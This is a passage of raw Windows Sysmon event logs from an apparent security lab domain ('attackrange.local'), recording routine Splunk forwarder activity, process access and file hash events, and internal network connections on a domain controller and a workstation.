08:05:52.900{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054103Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:52.900{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054102Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:52.900{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F7E0-60EB-E27D-00000000CF01}9448C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054101Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:52.881{466BC892-F7E0-60EB-E27D-00000000CF01}9448C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001054100Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:52.764{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FD556319598330280BD028017301C6E5,SHA256=BE6E8C8192FD090D1B47799C2F36EF4761E1EDE18D323EED86A07084BF42BFD2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810037Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:52.011{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE01792328C14E7A5F475307298A99CE,SHA256=435936B88978AD6263825CC968CAB04C541B62CCBDD610BDAE584A85D65033F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054099Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:52.547{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=854462229D8E3DD430DFEA2754F40177,SHA256=CB422239845D74463F2187F5BA17E6B9D2DDED9E5E2EFF850FFC3F7B2DC083BA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054098Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:52.512{466BC892-F7E0-60EB-E17D-00000000CF01}78683752C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054097Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:52.228{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F7E0-60EB-E17D-00000000CF01}7868C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054096Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:52.212{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054095Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:52.212{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054094Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:52.212{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054093Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:52.212{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054092Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:52.212{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F7E0-60EB-E17D-00000000CF01}7868C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054091Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:52.212{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F7E0-60EB-E17D-00000000CF01}7868C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054090Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:52.213{466BC892-F7E0-60EB-E17D-00000000CF01}7868C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001054119Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:53.889{466BC892-F7E1-60EB-E37D-00000000CF01}98329420C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001054118Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:53.889{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=95628B1B8A1970FF15578A387A4001CB,SHA256=9A9990991A789BD854AF6EDA6486C19E620DEC0264AF7BCB86339BDD4B365EB7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054117Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:53.773{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98FDF10C7819D3173CEF6A2011C1AEE7,SHA256=ED168D2F12C036E7D0C0887A5FE3686E57BB72C0DB95B4C9878E720284EBAC6C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810039Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:52.363{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57439-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000810038Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:53.011{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=429C2FA5D39B2C840EAC5D170ECA5A0A,SHA256=3E890E51F1431AA4D8B9A34A51C3ACE36441AEE62D019D84E9731CC957AD67E5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054116Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:53.573{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F7E1-60EB-E37D-00000000CF01}9832C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054115Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:53.573{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054114Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:53.573{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054113Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:53.573{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054112Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:53.573{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054111Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:53.573{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F7E1-60EB-E37D-00000000CF01}9832C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054110Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:53.573{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F7E1-60EB-E37D-00000000CF01}9832C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054109Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:53.568{466BC892-F7E1-60EB-E37D-00000000CF01}9832C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001054130Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:54.990{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=2A1E5E280AA10E6C544721883C560CDE,SHA256=64D43B339F81477921F41E257EFB70F1707292E562A444334A2239731A9874CE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054129Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:54.790{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E41A270A1E20C2826848814E710DA87,SHA256=4862AB026971C70A759D8780096D1B237196EA2B69A842207EB5B9E4E9A7AA68,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054128Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:45.656{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61940-false10.0.1.12-8000- 10341000x80000000000000001054127Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:54.105{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F7E2-60EB-E47D-00000000CF01}4920C:\Program 